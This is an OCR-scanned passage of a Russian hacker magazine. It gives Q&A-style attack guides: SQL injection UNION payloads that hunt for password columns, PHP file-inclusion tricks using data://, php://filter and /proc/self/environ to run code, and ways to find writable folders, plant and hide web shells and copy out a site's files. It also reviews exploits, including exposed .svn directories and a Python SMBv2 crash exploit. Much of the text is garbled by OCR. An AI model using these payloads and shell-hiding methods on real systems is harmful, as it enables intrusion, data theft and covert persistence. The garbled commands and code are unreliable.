Оператор N01 6ІКЕ проверяет соответствие возвращаемомузначениюза- 
данному образцу. Этот оператор абсолютно противоположен предыдущему, и 
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используя предыдущим пример, мы 
составим запрос: 



йи| [С-ЯЕЯН 501 ] |С«Айк і=ИР-г*д(| [НниДОк] 



лг 



-т- 

■*іл | Ч- опгкмі:* *!■:■» *гМПлЛА.1лМ» мГшпл.нН. ||лш+.':*1ммш іі^іііі 
тпч 1 | л* с Рирч^.*? ■ОЩП^^ѴЧУІИП «Ѵ.РИ* 



Выбираем все, что связано с 

' 355 * 



Ь.ббр : //зібе . сот/ 
зсгірб . рЬр?іб=-1- 
+ипіоп+зе1есб+1 , дгоир_ 
сопсаб (сопсаб_ 
члз ( ОхЗА, ІаЫе_ 
зсЬета , баЫе_пате , со1итп_ 
пате) ) , 3+бгот+іп богтабіоп_з сйета . 
со1итпз+ѵгЬеге+со1итп_пате+Ж)Т+1іке+ ' %разз% ' -- + 

Будет вывод всех доступных баз и таблиц за исключением 
следующих зібеі :изегз :раззчлгагб, зібе2 :изег :изег_раззѵтб 



3. РЕѲЕХР (или синоним РЕІКЕ). 

Оператор РЕѲЕХР проверяет, соответствует ли значение регулярному выра- 
жению. 



Для работы с этим оператором следует использовать регулярные значения в 
стиле Р05ІХ. К примеру, для получения того же результата, что и с оператором 
61 КЕ в первом примере, составим регулярное выражение ‘(.*)ра55(.*)’, запрос 
приметвид: 

Ъ.ббр : //зібе . сот/ зсгірб . рПр?іб=-1- 

+ипіоп+зеіесб+1 , 2 , дгоир_сопсаб (сопсаб_ѵ73 ( ОхЗА, баЫе_ 
зсЬета, ІаЫе_пате, со1итп_пате) ) , 4+бгот+іпбогтабіоп_ 
зсйета . соіитпз+ѵбіеге+со1итп_пате+г1іке+ ' ( . *) 
разз ( . * ) 1 --+ 

Такой запрос возвратит зібеі : изегз : раззчлгогб, 
зібе2 :изег :изег_раззтлб 

Итак, мы разобралитри оператора на примере имени столбца, аналогично 
их можно использовать в имени таблицы (іаЫе_пате в базе ІаЫез базы 
іпЬгтабоп_5сбета]. ѴѴАВМІМС! Не забывай, что база іпФгтабоп_5сбеппа 
присутствует только в МуЗОЕ версии 5.* и выше. 



ЗАДАЧА: Я ПРОЧЕЛ СТАТЬЮ О СПОСО- 
БАХ РАСКРУТКИ ИНКЛУДОВ, ОДНАКО 
ДАННЫЕ СПОСОБЫ МНЕ НЕ ПОМОГЛИ, 
КАК БЫТЬ? 

РЕШЕНИЕ: 

Есть еще несколько вариантов, ноонитребуют«особыхусловий»для ре- 
ализации. Докручивать инклуд мы будем двумя способами — с помощью 
так называемого «упаковщика» баіа и фильтров Еііег. Разберем подроб- 
нее. 

1. Могучий баФ. 

Требования для использования метода: 

a) а11оѵт_иг1_іпсіибе должна быть включена . (а11оѵт_иг1_ 
іпсіибе = оп в файле рйр.іпі) 

b) Отсутствие символов перед нашим значением, т.е. 
іпсіибе ('. /біг/ '. $бііе) ; не подходит, а іпсіибе ( $бііе) ; 
отлично подойдет ! 



2. Фильтруем базар или удобный Шег. 

Требования для использования метода: 

a) Отсутствие символов ПЕРЕД нашим значением в инклуде 
(аналогично первому методу) . 

b) Наличие соответствующего фильтра (для просмотра ус- 
тановленных фильтров использовать функцию збгеат_деб_ 
біібегз) . 

3 ) РНР версии 5.0.0 и выше . 

Уязвимый КОД: 

<?рЬр іпсіибе $_СЕТ [ " бііе " ] ; ?> 

Составляем запрос: 

?бііе=рЬр : //біібег/сопѵегб . Ъазе64-епсобе/гезоигсе=/ 
Тюте/изег /ѵіѵт/ іпбех . рНр 




Это, конечноже, немного осложняетситуацию, однако, если стоят какие- 
либо фильтры на присутствие слов «ЫЕр://», «ЕЕр://» и т.п., то, естественно, 
провести РРІ не удастся, тут-то нам и пригодится данный метод. 

К примеру, если у нас есть уязвимый код: 

<?рНр іпсіибе $_СЕТ [ " бііе " ] ; ?> 

Смело составляем запрос 

?бііе=баба: арріісабіоп/х-Пббрб-рЬр; Ъазе64 , РБ8д2Х2ЬЬСдк 
Х0бЕѴЕзпУ2 9к28ббКТздР24&собе=р1іріпбо ( ) ; 

Разберем подробнее: 

баба — непосредственно указывает, что будем использовать 
"упаковщик" баба 

арр1ісабіоп/х-Ьббрб-р1ір указывает тіте-тип данных, в 

нашем случае это тип данных рйр- скрипта 

Ъазе64 — указывает, что входящие данные зашифрованы в 

Ъазе64 

РБ8д2Х2ПЪСдкХ0бЕѴЕзпУ29к23ббКТздР24 — входящие данные 
(после расшифровки "<? еѵаі ( $_СЕТ [ 1 собе ' ] ) ; ?>" ) 
собе=рПріпбо ( ) ; — переменная, используемая в еѵаі 

Выполняем запрос и созерцаем заветный рЬріпЕоО . 
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Разбор полетов: 



За что боролись, на то и напоролись :] 

аівд/Г*ег$/)гк .рЬр*іе«ч&в:арр№Ьоп/хЧ*ІрР-рЬр;Ьв5«64 > ГОѲд2Х2ЬЬСдІОФРРѴР$пѴ29и5РРкТ кРг4&соРе-фПр<пРоО; - Р 

& ійг * Й • 

РНР Ѵег$іоп 5.2.4 



$у*іет 


ѴЯпРоѵте ЫТРВО 51 Ьи!Н 2600 


ВШИ 0.*е 


Аид 30 2007 07:05:48 


СоИІ^ІИ» СоіІИІМІНІ 


с*сгірІ/по№до сопЛдисв|$*-епаЫе-$пар8ПоРЬии(Г*«ѵѵііЬ-до=$ГіагесГ 


$мѵе* АРІ 


АрасПе 2 0 НапРІег 


ѴЫіілі Оквсіоіу Бирроіі 


епаЫеР 


СопЛдшлНоп Рі* «ріфіпіі 
Р.ИІІ 


С.ІѴѴМЭаѵѴЗ 


1о.*1е<1 СоііГюііі.*іо<і Ріе 


2:1и$гМосаі\рЬр5\рІ>р іпі 


РНР АРІ 


20041225 


РНР ЕхІ«п«Іоіі 


20060613 


2е«Р ЕхТеіізіоц 


220060519 


Оеінід ВШИ 


по 


ТІИв.Щ $лГе«у 


епаЫеР 


2еп«І Мешоіу Млімдеі 


епаЫеР 


ІРѵ6$4іиимі 


епаЫеР 


Ве^іЯеі е<1 РНР 51ге.т»п$ 


рИр, Ліе. Раіз. пар. Яр. сотргез* 2 ІІЬ 


Ве<р$1еіе<1 ЗДе.мп ЗоскеІ 

ТіЛИфОІІ* 


Іср, иРр 


КадМмаР Яіааіп РИім* 


сопѵеЛ Ісопѵ*. «аігѵдгоіі 3. вігіпд Юиррвг. *Шпд Іоіожвг. *Шпд *&1р_1адв. 
сопѵвП*, сопвитвР. аіь • 



ІТЬкв ргодгат таке* иве оППв 2епР всгірвпд Ьапдиада Епдіпа: _ 
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взлом 



Еагу 

Наек 



Еагу 


Еагу 


Наск 


Наск 



рйр: //ТіІДег — указывает, что используются фильтры 
сопѵегР — указывает, используются преобразовывающие 
фильтры 

Ьазеб4-епсобе — указывается сам фильтр 

гезоигсе — указывается расположение требуемого файла 



Результатом данного запроса мы получим исходный код файла іпсіех. 
рбр, зашифрованный Ьазе64, останется лишь расшифровать и изучать 
исходный код недруга. 

Почитать подробнее о данных функциях можно на рЬр.пеІ 



№4 



ЗАДАЧА: СДЕЛАТЬ РИП САЙТА 



РЕШЕНИЕ: 

Давай рассмотрим, какже можно сделать рип сайта без лишнего гемор- 
роя. 

1. Начать, я думаю, нужно как всегда с инструментов, встроенных в 
сами шеллы. Тут можно говорить только о с99 и ѵѵзо шеллах (из попу- 
лярных]. г57, к сожалению, никаких инструментов для рипа не предо- 
ставляет. Итак, что же мы делаем. В с99 просто отмечаем галочками 
файлы и папки, которые необходимо упаковать в выпадающем меню, 
снизу выбираем сору и жмем «СопЛгт». После этого появится меню с 
пимпой «Раск ЬиІТег Іо агбіѵе» и полем с названием архива, в которое 
можно ввести так же и путь. Все, теперь у нас есть архив. 

В ѵѵзо- шелле все не так просто. Необходим РНРверсии > 5. Но, вобщем 
и целом, также отмечаем галочками нужный контент, выбираем из 
списка внизу «сотргезз / і\р» и жмем «>>». Затем переходим в папку, 
куда нужно сохранить архив, выбираем в меню«раз1е/ гір» и сохраня- 
ем. Скажу по секрету, в этом шелле скоро будет сделан удобный рип, т.к. 
я общался соРЬ’ом и он согласился, что дело это нужное и полезное, 
и пообещал включить в следующий релиз шелла достойную и удобную 
поддержку архивации. Так что — следи за релизами ѵѵзо. 

Все это вроде бы удобно, но медленно и без возможности ставить маски. 
В дополнение к минусам — шелл не пойдет по вложенным папкам, если 
в них нужно упаковать невсе.да и процесс проставления галочекна 
нужных файлах далек от идеала. Особенно, если файлов паковать мно- 
го, и они смешаны с ненужными. 

2. С шеллами покончили, рассмотрим, какие возможности нам пред- 
лагает альтернативный софт. 

На глаза попался скрипт Аіба II пдгіррег (а ІТаи пдгіррег.сот/ги] . 

Это бесплатная софтина на РНР состоит из одного единственного 
файла, поддерживает великий и могучий и имеет приятную морду и 
несколько полезных настроек. Для работы скрипту нужен РНР (версий 
4.3.2 >= 5.2.5] и 2 ІіЬ. В настройках можно указать рабочую дирректорию, 
ходить или нет по вложенным папкам, имеются исключения папок и 
фильтр по расширению файла. Запакуется все в отдельный файл с собс- 
твенным расширением .аиае. 

Процесс распаковки также достаточно прост и понятен и, в сущности, 
сводится к нажатию нашей горячо любимой кнопочки «пехі». На сайте 
есть описание и демо-версия, можешь для начала посмотреть и даже 
попробовать все возможности прямо на сайте. 

Из плюсов можно заметить, что РНР наплевать на ограничения, нала- 
гаемые на сервере злобны ми ад минами, старающимися усложнить нам 
жизнь. А в частности, отключение многих нужных и полезных функций, 
которые не дают нормально работать шеллам, для нее не помеха, архи- 
вация идет с помощью рбр-функции дгѵѵгііеО . 

Из минусов, опять же, скорость ну и то, что это дополнительный файл, 
который нужно аплоадить на шелл. 

3. Ну и, наконец, переходим к самым мощным средствам, предостав- 
ляемым самой осью. Это утилита Іа г. 

Все опции я, разумеется, описывать не буду, достаточно несколько 
примеров. А самые дотошные смогут самостоятельно прочитать хелп с 
довольно внушительным списком опций. 

Итак, примеры: 

Запаковать папку шш со всеми вложенными файлами в файл 
1 . Саг 

Саг -об І.Саг /шт/ 



■ рив Т --ріір 


40.49 Кб 


2009-07-23 19:23:34 


Л гвагсН.рНр 


121,69 КВ 


2009-04-07 23:41:55 




20.Н Кб 


2009-04417 23:41:59 


Щіегѵег.ріір 


2,51 КВ 


2008-11-18 12:17:04 


Л ■іі-ѵѵ,}гсирі.еНо 


9-71 К& 


2009-04-0-7 23:42:00 


Л 'іи^рОЙ.рНр 


11,04КБ 


2009-04-07 23:42:01 


Я ; ■іО'л'іЭігезгі .р^р 


71.62 Кб 


2009-04-0 7 23:42:09 


Л з рІ_епти-_1ор 


0В 


200Ѳ-1 1-15 12:17:06 


Ш "ѴІе зѵ-іЕсЬ і|5 


4.33 К& 


2009-04-03 00:11:27 




32.01 Кб 


2009-04 -07 23:42: 13 


2І ' ■: о г Р-іГ' 


13.02 Кб 


2009-04-07 23:42:14 


Д ■ геасігаіб.рі . 


е .42 кв 


2009-04-07 23:42:15 


Щ'І ібайЕ-ЗО рлр 


12.00 КБ 


2009-04417 23: 42; 16 


Ш иъег.рЬр 


2-81 КВ 


2008-11-13 12:17:09 


Л ч віСр.рЬьі 


ЗЭ.бЭ КБ 


2009-04-07 23:42:13 


Я и еівпмйе рЬр 


ІѲ.5В КБ 


2009-04-07 23:42:20 


Я таІійаСйг.рИр 


4.49 КВ 


2003-1 1-18 12:17:10 


Я ѵврой^ак.р^р 


9-61 К& 


2009-10-04 09:14:05 


Я ■ ІІСІЙПСІ5 .ріір 


5-45 К& 


2009-00-25 19:03:38 


Я ѵ аІм,«в 


65 Ё 


2009-04 -08 00:11:26 



Рип сайта через шелл ѴѴ50 



АІіаУпдгіррег 



Рмлб ьиигч & те и«увг 

ѴДОВЛ4 32»624 ТЕ9ТРАЗЗЕО 
ТЕЗТ РД-$$бО 

так вямдяепвт* ЭП»-= 30 «с ТІЗТРДЗЗШ 
« г* Л щЛ «И* той** 

орелг»эіиаііііі«^ш(чіі тевтра§з6[> 

«ѵтопд итоіваПкі ТЕ ВТ РА55Е0 
0(нпіпв1вв’1й* Г» ГНЙП0 ТЕЗТ РА53ЕО 
гі'іі}г> 5 Гг нп №У Рк ТЕ8ТРДЖЕЕ0 

Аі геаоуіе сотой сикілні нщК Рим* <№«• (о оущгте 



Установка АІіаІІпдгіррег на хост(рип сайта] 




Рип сайта через шелл с99 

Запаковать папку ѵѵѵѵѵѵ со всеми вложенными файлами и файл 
ІоІ.рЬр из текущей папки в файл І.Саг 
Саг ~с± І.Саг /шт/ Іоі.рйр 

Запаковать папку " /изг/йоте/ѵлллѵ/» и сжать архив дгір'ом 
в файл " /изг/Ьоше/ішадез/1 . Саг . дг " 

Саг -С 2 І " /изг/Тюте/ітадез/1 . Саг . дг» «/изг/Ьоте/Ііопа/ 
зТюр . ^аЬегІіс-шзк . ги/ѵллпл/ " 

Запаковать все рйр-файлы и картинки прд из текущей диры и 
сжать архив Ьгір2'ом в файл аЬс . Саг . Ьг2 
Саг -СЗ'І аЬс.Саг.Ь22 *.рйр *.зрд 

Тут применимы любые конвейерные конструкции, вроде: 

Найти в текущей дире и всех вложенных скрипты рНр, упако- 
вать, ужать дгір'ом в файл а.Саг.дг 

Тіпсі . -паше '^.рЬр 1 | Саг -сгѵР а.Саг.дг -Т по- 

гесигзіоп 
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ЗАДАЧА: НАЙТИ ПАПКУ С ПРАВАМИ НА 
ЗАПИСЬ НАСКОМПРОМЕТИРОВАННОМ 
СЕРВЕРЕ 



можем легко воспользоваться поиском. Находим в текущей директории папки 
справами назапись: 

зузСет ( ' ііпсі . -регш -2 -Суре сі -1з ' ) ; 



РЕШЕНИЕ: 

Наверноеды не раз сталкивался стакой проблемой, какпоискдоступной на 
за п и с ь па п ки . До пусти м , у те бя есть зд I- и нъе кци я с Еі 1е_р гі ѵ, а куда за л и вать 
шелл — пока непонятно. 

Что же делать в та ком случае? Ксожалению, ничего кардинального, позволя- 
ющего со 100% вероятностью найти та кую папку, нет, новотоблегчитьпоискя 
тебе помогу. 

1. Для начала осматриваем ресурс на наличие загрузок. Картинки, ава- 
тарки, еще какие-нибудь файлы. Если такая возможность существует, 
грузим то, что разрешено, и смотрим, куда это сохранилось. Скорее 
всего, папка, в которую мы смогли загрузить картинки, как раз и будет 
доступна на запись. 

2 . Неплохо было бы просканировать сайт каким-нибудь сканером дирек- 
торий и обратить внимание на такие каталоги, каксасбе, сасбез, иріоасіз, 
боѵѵпіоасі, аѵаіагз, ітадез, Ітр, Іетр и т.д. Вообще, такие папки надо про- 
сматривать в первую очередь (они присутствуют довольно часто и нередко 
как раз доступны на запись ). Вот парочка онлайн-сканеров, которые тебе в 

ЭТОМ ПОМОГУТ: 

тасіпеС . пате/СооІз/тасІзз/ 
зесигіСу-сІіддег . огд/ 



3. Если сканер ничего не обнаружил, а ресурс крутится на паб- 
лик движке, то можно скачать исходник и выяснить, куда там 
что грузится. 

4 . Особое внимание стоит обратить на форумы (если они имеют- 
ся]. Если аватары хранятся не в базе, то папка под них также даст 
возможность залить шелл. 

5 . Если у тебя имеется инклуд или исполнение кода, то найти 
директорию под запись, конечно, гораздо проще, но многие и 
тут умудряются попасть в тупик. 

Давай посмотрим, что можно сделать. Допустим, утебя еѵаіили 
ргед_герІасе с модификатором/е. То есть, чистое исполнение 
кода. Если админ нам ничего не выключал, тоу нас есть возмож- 
ность выполнятьсистемные команды, и какты понимаешь, мы 



Бывает, что какие-то функции отключены (смотри рбріпіоО, раздел сНзаЫе_ 
ІипсЕопз]. Помни, что системные команды можно выполнять нетолько через 
зузІетО.также отлично подходит разз1:Ітги(],5Іте11_ехес(] ит.д. 

6. Есть еще одна штука — тадіс_дио1:е5_дрс. Она многим портит жизнь. 
Если выполнить «зузіюгтфіз]» можно при любых значениях, то «зузіегтфіз 
-Іа]» просто так не осуществить. В этом случае многие забывают такую 
классную штуку, как сЬг. 

зузСеш( ’1з -Ііа' ) = = = зузСеш(с1іг (10 8) . сііг (115) . сЪг (32) . 
сЬг (45) .сЬг (108) .сЪг (105) . сЪг (97) ) 

С инклудом ситуация полностью аналогична. Допустим, утебя ЕЕІ и возмож- 
ность про инклуд итьепѵі гоп. Что мы делаем? Посылаем такой запрос: 

іііе .ріір?іі1е= /ргос/ 
зеіі/епѵігоп 

Юзег-АдепС: <?рЪр зузСет('1з -Ііа'); ?> 

— наблюдаем листингдирекгории. 



Вывод команды «Із -Ііа» 





ЗАДАЧА: КАК ЗАМАСКИРОВАТЬ ШЕЛЛ, 
ЗАЛИТЫЙ НАСЕРВЕР? 



РЕШЕНИЕ: 

Вариантов сокрытия шелла масса, разберем некоторые базовые методы. 

1. Маскируем расширение. 

К примеру, у нас есть директория «ітадез», доступная на запись, в ней 
хранятся картинки с расширением .діЕ, у нас есть вариант залить шелл с 
расширением .діі и добавить в директорию файл .Ыассезз со следующим 
содержанием: 



АскіНапсІІег арр1ісаСіоп/х-ІЩЦрс1-р1ір . діі 



Каквидно, мы даем серверу инструкцию интерпретировать файлы *.діЕ как 
рбр-скрипты. 

2 . Маскируемся под местность. 

Допустим, у нас вдиректории есть файлы: 



соппесС . іпс . ріір 
іипсР іопз . іпс . ріір 
оСІіег_іипсЦ іоп . іпс . ріір 
сопіід . іпс . ріір 



Мы можем переименовать наш шелл, например, в таіпДюпсбопз.іпс.рбр, 
и он более-менее нормально впишется в окружающую обстановку. 

3. ІоисЬ, ІоисЬ, ты могуч... 

Дабы не провоцировать админа, меняем дату изменения нашего свежеза- 
литого шелла. 

В этом нам поможетзаветный Іоисб, будем использовать одноименную 
функцию РНР. 

4 . Гостеприимный ітр. 

Кпримеру, еслиу нас Ш,то можно закачать файл шелла в директорию/ 
Ітр, она, как известно, в 99% случаев доступна на запись, ктомужетам 
зачастую хранятся файлы сессии. Файл маскируем под сессию, далее 
просто инклудим его как ни в чем не бывало (?ЕіІе=../..Атр/зез5_с1 1 768Ш66 
Ш44сШсІс5110с8825246). 

5 . Смена хозяина. 

Допустим, мы перезалили под рутом наш шелл в нужную директорию, 
только шелл больно палевный.т.к.уфайла овнер и группа стоятправа 
рута: 

-ГШГ-Х--Х 1 гооС ѵіЬеІІ 5043 2009-07-09 13:51 зііеіі.ріір 

Нужно под рутом сменить владельца файла и группу на данные владельца 
директории. Кпримеру, сбоѵѵп ѵѵѵѵѵѵзЬеи.рбр сменит владельца файлу 
ѵѵѵѵѵѵзЬеІі.рбр. т 
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I АНДРЕЙ КОМАРОВ КОМАКОѴ@ІТОЕРЕМСЕ.ВІІ ИТЦ «АНАЛИТИКА» / ІТОЕРЕМСЕ.РУ 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 




Г5 


1 





ОБЗОР ЭКСПЛОИТОВ 

НАКОНЕЦ ВАШ ПОКОРНЫЙ СЛУГА ВЫШЕЛ ИЗ ПЕРИОДА ЗАТЯЖНОГО ЗАПОЯ И РАЗБИВАНИЯ ВСЕВОЗМОЖНЫХ АКСЕССУАРОВ НА ТЕРРИ- 
ТОРИИ МОСКОВСКОГО МЕТРОПОЛИТЕНА. Я СНОВА В СТРОЮ. ПОЭТОМУ ЗНАКОМАЯ РУБРИКА БУДЕТ ТОЛЬКО УСИЛЕННЕЕ РАЗВИВАТЬСЯ 
ОТ НОМЕРА К НОМЕРУ. ТЕПЕРЬ Я ПРАКТИЧЕСКИ ВСЕГДА НА СВЯЗИ. ПОЭТОМУ ПИШИТЕ МНЕ ПИСЬМА. И Я С УДОВОЛЬСТВИЕМ НА НИХ 
ОТВЕЧУ. 



ЕХРШТ5 

РЕѴІЕѴѴ 




йігеаІІу.гЬс.ги 

собрал: іѵп 

время: 08.07.2009 03:08:34 

$ѵп адрес: 

пользователи: 

всего файлов: 566 



Тгіепсіз.гатЫег.ги 

собрал; йіл 

время: 08.07.2009 01:43:51 

ьѵп адрес: 

пользователи: 

всего файлов: 99 



о сіх.ги ★ Ш 

собрал: Ігіп 

время: 07.07.2009 17:11:32 

$ѵп адрес; 

пользователи: 



С 404.$Ь(тІ 
С Гаѵісоп.ісо 



Вйс 
В ах 



РАСКРЫТЫЕ СТРУКТУРЫ САЙТОВ — КРОМЕ БЕЗОПАСНОСТИ. ВМИГ ПОСТРАДАЛА И РЕПУТА- 
ЦИЯ. УМЕЛЫЕ ХАКЕРЫ РАЗОБЛАЧИЛИ ОБИЛИЕ ПЛАГИАТА НА ЛЮБИМЫХ РУССКИХ ѴѴЕВ-СЕР- 
ВИСАХ, ПОСЛЕ ЧЕГО ВУЗКОМ КОНКУРЕНТНОМ КРУГУ ПОШЛИ ТИХИЕУХМЫЛКИ 



всего файлов: 558 

□ .Массезз 
О сЦеоШ 

О С8В.РІТР 

□ сігоі: ш.РІТО 
О ГэмсшЛш 
[_[ ггіех.ріто 




БЕЗОПАСНОСТЬ МЕТАДАННЫХ 
АРХИТЕКТУРЫ 5ѴИ 



І:УЛ Уязвимость имеет силу на проектах, исходные коды которых 
обновляются через 5ѴІ\І, и веб-сервер незапрещаетчитатьскрытыеди- 
ректории. Поумолчанию ни один веб-сервер это не делает. Архитектура 
5ѴІ\І предусматриваетхранение метаданных и версионную информацию 
файла для каждой директории исходных кодов. Данные находятся в 
метадиректории «.зѵп». Получив доступ к ней, можно, как минимум, пос- 
троить файловое дерево проекта, узнать ЬРІ_ основного репозитория, 
список пользователей 5ѴІ\І, получить доступ к исходным кодам проекта. 



ЕХРЮІТ 



| В одном из файлов под названием епіхіез находится список 
всех файлов и директорий, расположенных втой же папке, что и .зѵп. 
Также там находится информация о расположении репозитория, разме- 
ре файлов, даты их изменения и логины пользователей, работающих над 
проектом. Проще говоря, если проект разрабатывается с помощью 5ѴІ\І, 
то, заглянув по адресу ЫаЫа.ги/.зѵп/епЩіев . мы увидим файловую струк- 
туру корня проекта с авторами, последними изменениями, ссылкой на 
основную ветку репозитория и так далее. В той же папке .зѵп находится 
директория іехі-Ьазе, в которой лежат последние версии всех файлов, 
находящихся в репозитории. Картину дополняетто, что файлы имеютне 
стандартное расширение (например, . рЬ р) , которое позволяетих сразу 
отправить на интерпретатор, а дополнительное .зѵп-Ьазе, благодаря 
которому файл отдается запросившему его человеку «как есть», то есть 
голый исходный код! 



ЫаЫа.ги/ . зѵп/СехС-Ъазе/іпсІех . рЬр . зѵп-Ьазе 



пдіпх : 

ІосаСіоп ~ /.зѵп/ { 

Ьепу аіі; 

} 

АрасЬе : 

<БігесСогу ~ ".*\.зѵп" > 
ОгЬег аіісж, сіепу 
Бепу Пгогп аіі 
ЗаСізЬу АІІ 
</БігесСогу> 

Или: 



КеѵпгіДеКиІе ( \ . зѵп) / ( . *? ) — [Р,Ь] 



Уязвимость была афиширована моим хорошим другом Тгіп'ом и его 
компанией [ іѵѵосоіті га сіез.гиі . Уточню. что подобный классуязвимос- 
тей не нов и подробности этой уязвимости — тоже! Об этом писалось в 
статье еще трехгодичной давности І гесІ-ппегсигѵ.сопп/Ыоа/есІесІіс-ІесЬ/ 
Ьаскіпа-зиЬѵегзіоп-епІгіез-бІе І. но неосведомленность многих пользо- 
вателей сделала из этой исследовательской заметки целую сенсацию. 
Таким образом была раскрыта структура более трех тысяч крупнейших 
сайтов и информационных ресурсов рунета. Результат подсчитан из 
проверки примерно 2 миллионов сайтов. 




УЯЗВИМОСТЬ ПРИ ОБРАБОТКЕ 
5МВ-ПАКЕТ0В ВѴѴІЫ00ѴѴ5 ѴІ5ТА 
ИѴѴШООѴѴ52008 



50ШТІ0Ы 



|3акрыв доступ на чтение из скрытых директорий на сервере, 
ты обезопасишь себя от подобныхуязвимостей. 



5МВ или СІР5 (Соттоп Іпіегпеі Рііе Бузует] — протокол обмена 
«расшаренными» данными с файловой системой, использующийся по 
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ЮІТ5 

ЕѴѴ 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 




сл С:\МІМ00М5\5у5І:ет32\стс1ене 

МісгозоП; ЪІітіо№ ХР [Версия 5. 1.2600] 

(С) Корпорация Майкрософт, 1985-2001. 

С:ЧВоситепІ5 апй ЕеІІіпдзЧапЛге з>ыс 

"ыс" не является внутренней или внешней 

командой, исполняемой программой или пакетным Файлом. 

С:ЧВоситепІ5 апй ЕеІІіпдзЧапЛге з>зс 
Ю05/32А — РгоІесІеЛ Мойе Вип-Ііше Уегзіоп 7.2 
СоругідЫ <С> Еирегпаг Йузіепз, ЬЬА. 1996-2002 
5С/32А Раіаі: 00Б/32А епоігоппепі иагіаЫе із поі зеі 
Уои леей Іо геіпзіаіі 1*08/32 А сіи ап с ей ВОЙ Ехіепйег оп 

С:ЧВОСВМЕ ЛГ 1\ап(ігео>зс сопіід 

В05/32А — Ргоіесіей Мосіе Кип-Ііпе Уегзіоп 7.2 
СоругідЫ <С> Йирегпаг Кузіепз, Ыгі. 1996-2002 
5С/32А Гаіаі: В05/32А епиігоппепі иагіаЫе із поі зеі 
Уои пеей Іо геіпзіаіі ВОЙ /32 Айиапсей В08 Ехіепйег оп 

С : ЧВОСи МЕ"1 \ап Йг е ^ > 




ЕХРЮІТ5 

КЕѴІЕѴѴ 




ЕХРШІТ5 

РЕѴІЕѴѴ 



ир ргорегіу 
ЪЬіе сотрите г 



ЛЕКАРСТВО ДЛЯ ПОВЫШЕНИЯ 
БЕЗОПАСНОСТИ. НАХУДОЙ 
КОНЕЦ МОЖНО ЗАКРЫТЬ 139 И 
445 ПОРТ 



НАНЕ КОТО РЫХ КОМПАС ТАКАЯ 
ПРОБЛЕМА МОЖЕТ БЫТЬ ОЧЕНЬ 
РАСПРОСТРАНЕНА. УСТАНОВКА 
ПАТЧА Ш0532А.МАКЕСН К.ЫЕТ/ 
ІЫОЕХ_ЕЫ.НТМи РЕШАЕТ ЕЕ 




умолчанию. Обладает клиент-серверной архитектурой, — применитель- 
но кѴѴіпбоѵѵз это выражается в наличии: 

• СІіепНог МісгозоК ѴѴіпбоѵѵз (клиент); 

• Рііе апб Ргіпіег ЗИагіпд Іог Місгозо^ ѴѴіпбоѵѵз (5МВ-серверный компо- 
нент). 

5МВ на ѴѴіпбоѵѵз Ѵізіа и ѴѴіпбоѵѵз Вегѵег 2008 поддерживает новую 
улучшенную версию — 2.0. 5МВѵ2 является более адаптированным 
протоколом в условиях современного развития сетевых технологий 
(распространенность беспроводных сетей, возможные вынужден- 
ные задержки при обмене, высоконагруженность и уплотненность) с 
рядом преимуществ. Например, 5МВѵ2 поддерживаеттакие ходовые 
технологии «будущего», как ЕР5 оѵегѴѴіге (шифрование файловых 
систем на развернутой беспроводной инфраструктуре), (Шііпе 
РоШегз и т.д. 

Соответственно, ѴѴіпбоѵѵз Ѵізіа и ѴѴіпсІоѵѵз Зегѵег 2008 поддерживают две 
версии ЗМВ. Другой вопрос, что при взаимодействии с отличными от 
них системами, следует учесть следующие закономерности: 



# Шіеп 8МВ2 . О гесіеѵе а сЬаг іп кЬе "Ргосезз Ісі НідЬ" ЗМВ 
Ьеабег кіеІсЗ ік сііез иікЪ. а 

# РАСЕ_РАиЬТ_ІЫ_ШЫРАСЕБ_АКЕА 

кгот зоскек ітрогк зоскек 
кгот кіте ітрогк зіеер 

Ьозк = " I Р_АВЕР " , 445 

Ъикк = ( 

" \х00\х00\х00\х90 " # ЗМВ Ьеасіег: Зеззіоп шеззаде 
" \хкк\х53 \х4б\х42 " # Зегѵег Сотропепк : ЗМВ 
" \х72\х00\х00\х00 " # Ыедосіаке Ргокосоі 
" \х00\х18\х53 \хс8 " # Орегакіоп 0x18 & зиЬ 0хс853 

"\х00\х2б"# Ргосезз ІБ Нідк: --> : стандартное значение 
должно быть "\х00\х00" 



• Ѵізка сііепк о Ѵізка сііепк или Мпскжз Зегѵег 2 008 — 
ЗМВ 2 . О 

• Ыоп-Ѵізка сііепк о Ѵізка сііепк или Міпсіоѵѵз Зегѵег 
2 0 08 - ЗМВ 1 . О 

• Ѵізка сііепк о №эп-Ѵізка сііепк или Ыоп-Жпскдлз Зегѵег 
2 0 0 8 - ЗМВ 1 . О 

• №оп-Ѵізка сііепк о Ыоп-Ѵізка сііепк или Моп-ЭДіпсІочлз 
Зегѵег 2 008 - ЗМВ 1.0 



ЕХРЮІТ 



| Эксплоит представляет собой код на языке РуОзоп, столь 
активно использующемся в хакерском кругу. Все стандартно — установ- 



ление сокет-соединения, посылка вредоносного содержимого по адресу 
конкретного порта службы: 



" \х00\х00\х00\х00\х00\х00\х00\х00\х00\х00\хкк\хкк\хкк\хке м 
" \х00\х00\х00\х00\х00\х6б\х00\х02\х50\х43\х20\х4е\х45\х54" 
"\х57\х4к\х52\х4Ъ\х20\х50\х52\х4к\х47\х52\х41\х4б\х20\х31" 
" \х2е\хЗ 0\х00\х02\х4с\х41\х4е\х4с1\х41\х4е\хЗ 1\х2е\хЗ 0\х00 " 
" \х02\х57\х69\х6е\х64\х6к\х77\х73\х20\х66\х6к\х72\х20\х57 " 
" \х6к\х72\х6Ъ\х67\х72\х6к\х75\х70\х73\х20\хЗЗ\х2е\х31\х61 " 
" \х00\х02\х4с\х4б\х31\х2е\х32\х58\х30\х30\х32\х00\х02\х4с" 
" \х41\х4е\х4б\х41\х4е\х32\х2е\х31\х00\х02\х4е\х54\х20\х4с " 
" \х4б\х2 0\х3 0\х2е\хЗ 1\х32\х00\х02 \х53 \х4б\х42 \х2 0\х32 \х2е " 
" \хЗ 0 \хЗ 0 \хЗ 2 \х0 0 " 

) 



з = зоскек ( ) 



# ! /изг/Ып/руккюп 



з . соппеск (кюзк) 
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взлом 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



IV м примерна * ЭЮ дляиийііаи ІО.гв евкмд! 



ТАК МОЖНО ИЗУЧИТЬ 
ПРАВА^ОСТУПАНА 
ЛЮБОЙ СЕРВИС 



В ПОСЛЕДНЕЙ ВЕРСИИ ЫМАР 
ПРИСУТСТВУЕТ ОБНОВЛЕН- 
